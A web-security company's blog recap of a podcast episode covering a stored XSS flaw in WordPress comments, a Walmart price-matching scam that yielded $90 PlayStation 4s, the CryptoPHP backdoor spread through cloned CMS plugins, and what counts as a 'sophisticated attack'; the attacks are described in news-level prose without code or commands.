Industry Observations-Web Application Security-WhiteHat HackerKast

#HackerKast 11: WordPress XSS Vuln, $90 PlayStation 4s and CryptoPHP Backdoor

Happy Late Thanksgiving everybody! We started out this week going around talking about how thankful we are about browser insecurity, web application security, and the Texas cold front.

First story we talked about was a new crazy widespread XSS vulnerability in a WordPress Statistics “plugin” (I put plugin in quotes here because as of September 90% of sites had this WP-Statistics plugin installed, and that is down now to about 86% at the time of this post). The commenting system here is vulnerable to XSS very blatantly which leads me to be confused on how this took so long to come to light.

The proof of concept the researchers associated with this blog post was very nasty as this is a persistent XSS vulnerability. An attacker can leave a comment on a blog post, as the admin of the WordPress blog goes to approve this comment the payload will then steal that admin’s session cookies and send them to the attacker. Other possibilities include changing the current admin password, adding a new admin account, or use the plugin editor to write your own malicious PHP code and execute it instantly.

Next, we spoke about a clever less-technical business logic hack against Walmart. People were taking advantage of Walmart’s price matching clause by actually standing up fake manufacturers with lower prices. These pages would look legitimate enough but were in no way actual retailers. The most widespread use of this that caught the attention of the right folks was that people were getting PlayStation4s for $90. Robert was very upset about the fact that he heard about this after Walmart tightened their security controls.

Robert then gave us an overview of a new backdoor malware that is taking advantage of common blog plugins. These hackers were creating legitimate looking add-ons by creating near-exact mirrors of WordPress, Joomla, Drupal, etc,. plugins/themes. The attack itself is a combination of phishing and malware where they would with trick the admin of these blogs to install these near-mirror copies of the plugins with the addition of a backdoor called CryptoPHP. The solution to this is a hard age-old problem of where/who to trust a download of any sort of this code you are going to execute install.

Lastly, Jeremiah didn’t shy away from some shameless self promotion of a blog that we put out about the characteristics of what makes an attack “sophisticated.” This is an interesting blood-boiling topic for a few of us who have been around for a while. We see these press releases come out all the time that claim a recent breach was caused by a “sophisticated attack” later to find out that it was a plain vanilla SQL Injection. Jeremiah decided to step up and try to define what is needed to actually claim a sophisticated attack. This is by no means a complete list but certainly a start to which we welcome any and all feedback.

This week’s bonus footage comes from Robert who walked us through some cool research around clickjacking. Check it out!

Resources:

CryptoPHP Backdoor Hijacks Servers with Malicious Plugins and Themes

Scam Tricks Walmart into Selling $90 PS4s

Death by Comments: WordPress XSS Vuln is Biggest in Years

5 Characteristics of a ‘Sophisticated Attack’

Tags: web application security, web application vulnerabilities, WordPress